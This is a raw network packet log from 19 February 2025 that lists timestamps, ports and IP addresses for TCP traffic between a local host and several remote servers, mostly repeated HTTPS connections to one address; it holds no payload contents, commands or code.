Feb 19, 2025 20:56:21.955250025 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.955255032 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.956634045 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.959270954 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.959347010 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.959352016 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.963279009 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.963349104 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.963355064 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.963423967 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.963428974 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.967139006 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.967408895 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.967413902 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.970949888 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.971174955 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.971179962 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.976762056 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.977009058 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.977077007 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.977082014 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.977144957 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:21.977149010 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.979372025 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.979543924 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:21.979614019 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:22.021646023 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:22.029803038 CET	49760	443	192.168.2.4	142.250.186.78
Feb 19, 2025 20:56:22.029814959 CET	443	49760	142.250.186.78	192.168.2.4
Feb 19, 2025 20:56:22.152179956 CET	49769	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:22.152270079 CET	443	49769	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:22.152360916 CET	49769	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:22.152833939 CET	49769	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:22.152868032 CET	443	49769	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:22.819694996 CET	443	49769	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:22.819820881 CET	49769	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:22.820394039 CET	49769	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:22.820405960 CET	443	49769	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:22.830518007 CET	49769	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:22.830523968 CET	443	49769	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:23.289261103 CET	49751	443	192.168.2.4	172.217.16.196
Feb 19, 2025 20:56:23.321995974 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:23.322082043 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:23.322165012 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:23.322488070 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:23.322523117 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:23.562750101 CET	443	49769	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:23.562817097 CET	443	49769	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:23.562834024 CET	49769	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:23.562911987 CET	49769	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:23.563863993 CET	49769	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:23.563885927 CET	443	49769	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.028230906 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.028366089 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.034234047 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.034264088 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.036760092 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.036760092 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.036784887 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.036827087 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.036981106 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.037009001 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.037308931 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.037364006 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.037636042 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.037672043 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.037728071 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.037745953 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.037854910 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.037899971 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.038285017 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.038311005 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.038358927 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.038379908 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.038413048 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.038431883 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.038470984 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.038492918 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.038512945 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.047559023 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.328417063 CET	49773	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.328459024 CET	443	49773	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.328773022 CET	49773	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.338701010 CET	49773	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.338716030 CET	443	49773	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.982820034 CET	443	49773	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:24.982904911 CET	49773	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.983298063 CET	49773	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:24.983311892 CET	443	49773	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.003631115 CET	49773	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.003631115 CET	49773	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.003698111 CET	443	49773	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.003747940 CET	443	49773	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.003874063 CET	49773	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.003915071 CET	443	49773	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.004017115 CET	49773	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.004039049 CET	443	49773	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.326016903 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.326107979 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.326172113 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.326215029 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.326280117 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.327060938 CET	49771	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.327092886 CET	443	49771	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.377221107 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.377264023 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.377882004 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.378133059 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.378149033 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.989226103 CET	443	49773	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.989305019 CET	49773	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.989312887 CET	443	49773	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:25.990341902 CET	49773	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.990427017 CET	49773	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:25.990464926 CET	443	49773	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:26.027410984 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:26.027573109 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:26.028023005 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:26.028034925 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:26.030235052 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:26.030244112 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:26.030337095 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:26.030349970 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:26.030437946 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:26.030456066 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:26.030467033 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:26.030474901 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:26.030761003 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:26.030812979 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:26.031028032 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:26.031050920 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:26.031064987 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:26.031071901 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:26.383814096 CET	49775	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:26.383907080 CET	443	49775	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:26.384021997 CET	49775	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:26.384433031 CET	49775	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:26.384470940 CET	443	49775	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:27.033179998 CET	443	49775	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:27.033371925 CET	49775	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:27.033823967 CET	49775	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:27.033853054 CET	443	49775	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:27.036005020 CET	49775	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:27.036020994 CET	443	49775	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:27.262743950 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:27.262927055 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:27.262936115 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:27.264633894 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:27.264719963 CET	49774	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:27.264743090 CET	443	49774	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:27.419250965 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:27.419306993 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:27.419372082 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:27.419622898 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:27.419636965 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:27.776001930 CET	443	49775	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:27.776066065 CET	443	49775	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:27.776123047 CET	49775	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:27.776124001 CET	49775	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:27.776881933 CET	49775	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:27.776922941 CET	443	49775	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:27.843430996 CET	80	49723	217.20.57.20	192.168.2.4
Feb 19, 2025 20:56:27.843559027 CET	49723	80	192.168.2.4	217.20.57.20
Feb 19, 2025 20:56:27.843693972 CET	49723	80	192.168.2.4	217.20.57.20
Feb 19, 2025 20:56:27.848718882 CET	80	49723	217.20.57.20	192.168.2.4
Feb 19, 2025 20:56:28.077857971 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.077999115 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.078402042 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.078433037 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.079998016 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080014944 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.080071926 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080086946 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.080095053 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080111980 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.080173969 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080192089 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.080200911 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080213070 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.080316067 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080329895 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.080344915 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080358028 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080360889 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.080374956 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.080472946 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080491066 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.080501080 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080511093 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.080532074 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080543995 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.080637932 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080650091 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.080656052 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.080662012 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.457629919 CET	49777	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.457675934 CET	443	49777	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:28.457905054 CET	49777	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.458188057 CET	49777	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:28.458201885 CET	443	49777	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:29.124695063 CET	443	49777	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:29.124864101 CET	49777	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.125488043 CET	49777	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.125518084 CET	443	49777	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:29.127157927 CET	49777	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.127171993 CET	443	49777	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:29.127242088 CET	49777	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.127290010 CET	443	49777	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:29.127413034 CET	49777	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.127453089 CET	443	49777	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:29.127568960 CET	49777	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.127592087 CET	443	49777	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:29.336225986 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:29.336307049 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.336339951 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:29.336385965 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.336440086 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:29.336497068 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.337358952 CET	49776	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.337377071 CET	443	49776	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:29.497214079 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.497257948 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:29.497481108 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.497853994 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:29.497878075 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.135608912 CET	443	49777	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.135665894 CET	443	49777	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.135767937 CET	49777	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.135767937 CET	49777	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.137073994 CET	49777	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.137114048 CET	443	49777	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.165039062 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.165148020 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.165716887 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.165734053 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168009043 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168029070 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168102026 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168114901 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168163061 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168170929 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168279886 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168294907 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168315887 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168327093 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168358088 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168365002 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168467045 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168483973 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168494940 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168518066 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168519974 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168545008 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168587923 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168602943 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168694973 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168708086 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168734074 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168746948 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168787956 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168801069 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.168838024 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.168848038 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.527343988 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.527383089 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:30.527457952 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.527864933 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:30.527878046 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.216999054 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.217122078 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.217802048 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.217829943 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.219980955 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220005035 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.220074892 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220093012 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.220119953 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220129013 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.220251083 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220288038 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.220449924 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220478058 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.220611095 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220632076 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.220660925 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220673084 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.220748901 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220779896 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.220808983 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220824957 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.220856905 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220873117 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.220906973 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220921040 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.220959902 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220959902 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.220983028 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221004963 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221038103 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.221055031 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221148014 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.221175909 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221205950 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.221225977 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221498966 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.221514940 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221554995 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.221589088 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221623898 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.221647024 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221671104 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.221687078 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221728086 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.221744061 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221760035 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.221771955 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221808910 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.221823931 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221847057 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.221864939 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.221879959 CET	49779	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.221892118 CET	443	49779	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.373311043 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.373404980 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.373558044 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.373558044 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.374535084 CET	49778	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.374552965 CET	443	49778	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.545959949 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.546005964 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:31.546108961 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.546458960 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:31.546473026 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:32.191370964 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:32.191467047 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:32.192168951 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:32.192183018 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:32.194400072 CET	49780	443	192.168.2.4	116.202.180.73
Feb 19, 2025 20:56:32.194410086 CET	443	49780	116.202.180.73	192.168.2.4
Feb 19, 2025 20:56:32.194483042 CET	49780	443	192.168.2.4	116.202.180.73
